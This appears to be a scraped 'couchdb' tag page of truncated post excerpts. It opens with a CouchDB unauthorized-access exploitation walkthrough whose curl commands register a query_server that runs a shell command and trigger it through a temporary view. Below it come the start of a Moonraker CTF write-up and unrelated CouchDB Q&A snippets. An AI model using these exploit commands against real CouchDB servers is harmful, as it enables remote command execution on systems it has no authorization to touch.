couchdb

CouchDB Unauthorized Access Vulnerability

半城伤御伤魂 submitted on 2020-02-24 21:16:04
0x00 Installing CouchDB
CouchDB official website: http://couchdb.apache.org/
Click Next through the installer until installation completes, then open a browser and visit: http://127.0.0.1:5984/
The CouchDB web interface is available at: http://127.0.0.1:5984/_utils
0x01 Exploitation
1. Add a query_server configuration entry containing the command to execute:
curl -X PUT 'http://username:password@your-ip:5984/_config/query_servers/cmd' -d '"id >/tmp/success"'
2. Create a temporary database and a temporary table, and insert one record:
curl -X PUT 'http://username:password@your-ip:5984/vultest'
curl -X PUT 'http://username:password@your-ip:5984/vultest/vul' -d '{"_id":"770895a97726d5ca6d70a22173005c7b"}'
3. Invoke the query_server to process the data:
curl -X POST 'http://username:password@your-ip:5984/vultest/_temp_view?limit=10' -d '

Is there anything wrong with creating Couch DB views with null values?

萝らか妹 submitted on 2020-02-24 11:51:05
Question: I've been doing a fair amount of work with Couch DB in my spare time recently and really enjoy using it. I find it to be much more flexible than using a relational database, but it's not without its disadvantages. One big disadvantage is the lack of dynamic queries / view generation... So you have to do a fair amount of work in planning and justifying your views, as you can't put that logic into your application code as you might do with SQL. For example, I wrote a login scheme based on a

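Moonraker Target Machine Penetration Test

生来就可爱ヽ(ⅴ<●) submitted on 2020-02-22 08:25:29
0x01 Introduction
Attack the Moonraker system and identify its most serious vulnerability, then use that vulnerability to attack the target machine, escalate privileges, and obtain the flag in the root directory.
Moonraker: 1 image download address: http://drive.google.com/open?id=13b2ewq5yqre2UbkLxZ58uHtLfk-SHvmA
0x02 Information gathering
1. Obtain the target IP address using netdiscover or arp-scan.
2. Use nmap for port and service detection.
A Node.js Express framework application was found on port 3000.
Visiting the web service shows a video. The video animation lasts a little over 10 seconds and then automatically redirects to the following page: http://192.168.190.136/moonraker.html
Clicking blog leads to a showcase page, which does not appear to be useful for now.
Running dirb to enumerate directories finds http://192.168.190.136/services/index.html
Visiting http://192.168.190.136/services/index.html reveals a link on the site. Clicking it leads to an after-sales service page:
Services Information Request To provide "out of this world" service, a Sales rep will check your web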

Serving file with CouchDB attachment?

|▌冷眼眸甩不掉的悲伤 submitted on 2020-02-06 04:08:54
Question: I'm using Express. I can't figure out how to send an image file to the client in a way that it will be displayed in the HTML tag <img src='/preview/?doc=xxxxxx&image=img1.jpg'>. I'm using the Cradle getAttachment function to communicate with CouchDB https://github.com/flatiron/cradle
db.getAttachment(id, filename, function (err, reply) { set('Content-Type', 'image/png'); res.end(reply); });
I don't know what reply is exactly and how to transfer that image to the client without a buffer.
Answer 1: To transfer an

Approaches to generate auto-incrementing numeric ids in CouchDB

我的梦境 submitted on 2020-01-30 14:15:14
Question: Since CouchDB does not have support for SQL-like AUTO_INCREMENT, what would be your approach to generate sequential unique numeric ids for your documents? I am using numeric ids for:
- User-friendly IDs (e.g. TASK-123, RQ-001, etc.)
- Integration with libraries/systems that require a numeric primary key
I am aware of the problems with replication, etc. That's why I am interested in how people try to overcome this issue.
Answer 1: As Dominic Barnes says, auto-increment integers are not scalable, not

Redis, CouchDB or Cassandra? [closed]

南笙酒味 submitted on 2020-01-28 13:05:53
Question: What are the strengths and weaknesses of the various NoSQL databases available? In particular, it seems like Redis is weak when it comes to distributing write load over multiple servers. Is that the case? Is it a big problem? How big does a service have to grow before that

What are requirements to use CouchDB on Android?

天涯浪子 submitted on 2020-01-28 06:07:07
Question: I'd like to know the requirements to use CouchDB on Android. I've found an example application and the MobileFuton. Can CouchDB be used without having an external storage and is it usable on low-end devices as it is said to have a large memory and storage footprint? Please note the related CouchDB Forum Thread.
Answer 1: External storage (an SD card) is required for Couchbase for Android. I missed this and didn't have one configured on my emulator. Took me a bit to figure out that was the problem.
